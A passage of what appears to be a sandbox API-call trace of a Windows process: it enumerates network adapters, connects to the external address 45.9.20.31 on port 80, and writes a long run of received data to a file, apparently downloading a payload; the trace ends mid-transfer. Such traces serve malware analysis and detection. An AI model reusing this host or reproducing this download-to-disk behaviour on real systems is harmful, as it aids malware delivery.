AdapterAddresses=0x0, SizePointer=0x19f124*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x19f124*=0xa80) returned 0x6f [0288.917] LocalAlloc (uFlags=0x0, uBytes=0xa80) returned 0x5538730 [0288.917] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x5538730, SizePointer=0x19f124*=0xa80 | out: AdapterAddresses=0x5538730*(Alignment=0x700000178, Length=0x178, IfIndex=0x7, Next=0x55389e0, AdapterName="{E96D977E-F067-4CE9-924D-F6E0A04729E4}", FirstUnicastAddress=0x5538954, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection #2", FriendlyName="Ethernet 2", PhysicalAddress=([0]=0x0, [1]=0xb, [2]=0x60, [3]=0xed, [4]=0x4b, [5]=0x2f, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x1c5, DdnsEnabled=0x1c5, RegisterAdapterSuffix=0x1c5, Dhcpv4Enabled=0x1c5, ReceiveOnly=0x1c5, NoMulticast=0x1c5, Ipv6OtherStatefulConfig=0x1c5, NetbiosOverTcpipEnabled=0x1c5, Ipv4Enabled=0x1c5, Ipv6Enabled=0x1c5, Ipv6ManagedAddressConfigurationSupported=0x1c5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0x7, ZoneIndices=([0]=0x7, [1]=0x7, [2]=0x7, [3]=0x7, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6008002000000, Dhcpv4Server.lpSockaddr=0x55388a8*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11eb6c9dc20d55b0, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x28, [5]=0xb6, [6]=0x28, [7]=0x5e, [8]=0x0, [9]=0xf, [10]=0xf3, [11]=0xe1, [12]=0x61, [13]=0x38, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x6000ff3, FirstDnsSuffix=0x0), SizePointer=0x19f124*=0xa80) returned 0x0 [0288.935] LocalFree (hMem=0x5538730) returned 0x0 [0288.937] CoTaskMemAlloc (cb=0x20c) returned 0x5509430 [0288.938] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_Disabled", lpBuffer=0x5509430, nSize=0x104 | out: lpBuffer="") returned 0x0 [0288.938] CoTaskMemFree (pv=0x5509430) [0288.938] CoTaskMemAlloc (cb=0x20c) returned 0x5507600 [0288.938] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_MinCount", lpBuffer=0x5507600, nSize=0x104 | out: lpBuffer="") returned 0x0 [0288.938] CoTaskMemFree (pv=0x5507600) [0288.945] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x550 [0288.945] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x554 [0288.964] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x19efb0 | out: phkResult=0x19efb0*=0x558) returned 0x0 [0288.964] RegQueryValueExW (in: hKey=0x558, lpValueName="HWRPortReuseOnSocketBind", lpReserved=0x0, lpType=0x19efcc, lpData=0x0, lpcbData=0x19efc8*=0x0 | out: lpType=0x19efcc*=0x0, lpData=0x0, lpcbData=0x19efc8*=0x0) returned 0x2 [0288.965] RegCloseKey (hKey=0x558) returned 0x0 [0288.965] WSAConnect (in: s=0x550, name=0x21f32f4*(sa_family=2, sin_port=0x50, sin_addr="45.9.20.31"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0289.029] closesocket (s=0x554) returned 0 [0289.041] send (s=0x550, buf=0x21f3e1c*, len=73, flags=0) returned 73 [0289.043] setsockopt (s=0x550, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0289.043] recv (in: s=0x550, buf=0x21f1c00, len=4096, flags=0 | out: buf=0x21f1c00*) returned 2920 [0289.307] setsockopt (s=0x550, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0289.308] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.310] WriteFile (in: hFile=0x34c, lpBuffer=0x22061f4*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x22061f4*, lpNumberOfBytesWritten=0x19f25c*=0x1000, lpOverlapped=0x0) returned 1 [0289.325] WriteFile (in: hFile=0x34c, lpBuffer=0x21f670a*, nNumberOfBytesToWrite=0xfa32, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f670a*, lpNumberOfBytesWritten=0x19f25c*=0xfa32, lpOverlapped=0x0) returned 1 [0289.327] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.328] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.330] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 208 [0289.331] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 2920 [0289.362] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 16180 [0289.363] WriteFile (in: hFile=0x34c, lpBuffer=0x22061f4*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x22061f4*, lpNumberOfBytesWritten=0x19f25c*=0x1000, lpOverlapped=0x0) returned 1 [0289.364] WriteFile (in: hFile=0x34c, lpBuffer=0x21f6504*, nNumberOfBytesToWrite=0x3b6c, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f6504*, lpNumberOfBytesWritten=0x19f25c*=0x3b6c, lpOverlapped=0x0) returned 1 [0289.367] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 45260 [0289.368] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0xb0cc, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0xb0cc, lpOverlapped=0x0) returned 1 [0289.369] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 2920 [0289.416] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 16060 [0289.416] WriteFile (in: hFile=0x34c, lpBuffer=0x22061f4*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x22061f4*, lpNumberOfBytesWritten=0x19f25c*=0x1000, lpOverlapped=0x0) returned 1 [0289.421] WriteFile (in: hFile=0x34c, lpBuffer=0x21f65d4*, nNumberOfBytesToWrite=0x3a24, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f65d4*, lpNumberOfBytesWritten=0x19f25c*=0x3a24, lpOverlapped=0x0) returned 1 [0289.422] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 42340 [0289.423] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0xa564, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0xa564, lpOverlapped=0x0) returned 1 [0289.437] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 2920 [0289.469] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 45260 [0289.470] WriteFile (in: hFile=0x34c, lpBuffer=0x22061f4*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x22061f4*, lpNumberOfBytesWritten=0x19f25c*=0x1000, lpOverlapped=0x0) returned 1 [0289.472] WriteFile (in: hFile=0x34c, lpBuffer=0x21f65d4*, nNumberOfBytesToWrite=0xac34, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f65d4*, lpNumberOfBytesWritten=0x19f25c*=0xac34, lpOverlapped=0x0) returned 1 [0289.473] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 35020 [0289.473] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x88cc, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x88cc, lpOverlapped=0x0) returned 1 [0289.473] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 5840 [0289.521] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x16d0, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x16d0, lpOverlapped=0x0) returned 1 [0289.521] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 36520 [0289.521] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x8ea8, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x8ea8, lpOverlapped=0x0) returned 1 [0289.523] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.524] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.526] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 32136 [0289.526] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x7d88, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x7d88, lpOverlapped=0x0) returned 1 [0289.527] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 7448 [0289.581] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x1d18, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x1d18, lpOverlapped=0x0) returned 1 [0289.582] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.583] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.594] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.595] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.596] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.596] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.598] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.598] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.599] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.599] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.603] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 40240 [0289.607] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x9d30, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x9d30, lpOverlapped=0x0) returned 1 [0289.608] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 11680 [0289.636] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x2da0, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x2da0, lpOverlapped=0x0) returned 1 [0289.639] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.640] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.647] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.649] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.652] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.654] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.671] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.672] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.674] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.675] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.676] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.677] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.679] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.679] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.683] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.683] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.685] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.685] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.694] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.695] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.699] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.699] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.701] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.709] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.715] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.718] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.722] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.723] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.735] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.738] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.749] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.753] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.765] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.767] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.773] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.774] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.820] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.820] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.826] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.827] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.829] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.831] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.833] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.833] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.834] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.835] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.837] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.837] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.838] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.839] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.840] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.840] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.843] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.843] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.845] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.845] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.847] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.847] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.849] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.849] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.851] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.851] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.853] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 